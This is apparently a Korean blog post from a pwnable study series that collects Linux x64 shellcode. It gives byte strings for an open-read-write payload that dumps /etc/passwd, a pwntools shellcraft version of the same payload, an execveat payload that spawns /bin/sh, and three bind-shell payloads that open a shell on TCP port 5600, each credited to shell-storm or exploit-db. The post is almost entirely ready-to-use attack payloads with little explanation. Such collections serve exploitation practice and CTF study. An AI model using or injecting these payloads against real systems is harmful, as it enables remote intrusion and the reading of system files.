본문 바로가기
퍼너블/Shellcode

usefull shellcode (linux x64)

by 즉흥 2023. 11. 4.
728x90
반응형

유용한 쉘코드 모음

 

참고: https://shell-storm.org/shellcode/index.html

 

Shellcodes database for study cases

API It is very straightforward to communicate with this API. Just send a simple GET method. The "s" argument contains your keyword. http://shell-storm.org/api/?s= Use "*" for multiple keywords search. /?s= * * The output should be like this: :::: :::: ::::

shell-storm.org

 

1. orw shellcode

출처: https://shell-storm.org/shellcode/files/shellcode-878.html

 

Linux/x86-64 - Read /etc/passwd - 82 bytes

 

shell-storm.org

# orw shellcode
sc="\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff"
sc+="/etc/passwdA"

 

 

2. orw shellcode using pwntools

from pwn import *

#sc = shellcraft.pushstr(b'/etc/passwd')
#sc += shellcraft.open('rsp')

sc = shellcraft.open(b'/etc/passwd')
sc += shellcraft.read('rax', 'rsp', 0x100)
sc += shellcraft.write(1, 'rsp', 0x100)
print(sc)
sc = asm(sc)
print(len(sc))
print(disasm(sc))

 

 

3. evecveat

출처: ...

# 0x166 systemcall
# execveat shellcode
sc=b"\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05"
print(disasm(sc))

 

 

4. bind shell 5600

출처: https://www.exploit-db.com/exploits/41128

 

Linux/x64 - Bind (5600/TCP) Shell Shellcode (87 bytes)

Linux/x64 - Bind (5600/TCP) Shell Shellcode (87 bytes) EDB-ID: 41128 CVE: N/A Date: 2017-01-19

www.exploit-db.com

sc="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"

 

출처: https://www.exploit-db.com/exploits/39718

 

Linux/x64 - Bind (5600/TCP) Shell Shellcode (86 bytes)

Linux/x64 - Bind (5600/TCP) Shell Shellcode (86 bytes) EDB-ID: 39718 CVE: N/A Date: 2016-04-21

www.exploit-db.com

sc="\x48\x31\xc0\x48\x31\xf6\x99\x6a\x29\x58\xff\xc6\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x50\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xc0\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05"

 

출처: https://www.hackthesec.co.in/2016/04/linuxx8664-bindshell-port-5600-81-bytes.html

 

Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes Exploit

Hack The Sec-Leading Resource of Linux Tutorial,Linux Tips And Tricks,Linux Server,Linux Exploit,Shell scripting,linux books,unix,bash scripting.

www.hackthesec.co.in

sc="\x99\x6a\x29\x58\x6a\x01\x5e\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x50\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x99\x52\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x51\x54\x5f\x6a\x3b\x58\x0f\x05"

 

 

.

 
728x90
반응형

댓글